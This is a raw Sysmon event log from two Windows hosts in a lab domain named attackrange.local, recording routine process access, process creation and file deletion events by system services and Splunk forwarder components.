21:50:03.132{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638563Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.132{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638562Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.132{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638561Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.132{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638560Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.132{BFB545BB-B864-6058-0500-00000000AF01}6281076C:\Windows\system32\csrss.exe{BFB545BB-B40B-605B-2E5A-00000000AF01}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638559Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.132{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B40B-605B-2E5A-00000000AF01}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638558Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.133{BFB545BB-B40B-605B-2E5A-00000000AF01}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005917780Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.733{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917779Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.733{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917778Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.708{896A638B-B40B-605B-8669-00000000AE01}43767544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917777Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.563{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B40B-605B-8669-00000000AE01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917776Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.561{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917775Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.561{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917774Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.561{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917773Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.560{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917772Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.560{896A638B-B5C8-6058-0500-00000000AE01}396464C:\Windows\system32\csrss.exe{896A638B-B40B-605B-8669-00000000AE01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917771Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.560{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B40B-605B-8669-00000000AE01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917770Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.552{896A638B-B40B-605B-8669-00000000AE01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005917769Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.036{896A638B-B40A-605B-8569-00000000AE01}28846320C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917802Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.897{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D7D1C25891F4DCB1CD7B279D22FA80D,SHA256=D4DDCEE08A7A4DBF7CC37932DF1F7E4957F7E682A4576EEEE97C9F6AE07EE96C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638586Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:04.366{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E744E0988EA35B8264657A98C81600C,SHA256=A3C8D18808E211246979B3CDB25CB6B73E8A354E3D60A875DC538DADF1A1CA3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638585Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:04.366{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD890B25ADC6AFE534657E16D2EC8E4A,SHA256=9782B606C1C1875DC72201359BC3B1879438B6A727679326085CAF6C5DEBA697,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917801Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.877{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B40C-605B-8869-00000000AE01}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917800Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.876{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917799Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.875{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917798Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.875{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917797Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.875{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917796Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.875{896A638B-B5C8-6058-0500-00000000AE01}396356C:\Windows\system32\csrss.exe{896A638B-B40C-605B-8869-00000000AE01}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917795Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.875{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B40C-605B-8869-00000000AE01}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917794Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.866{896A638B-B40C-605B-8869-00000000AE01}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program 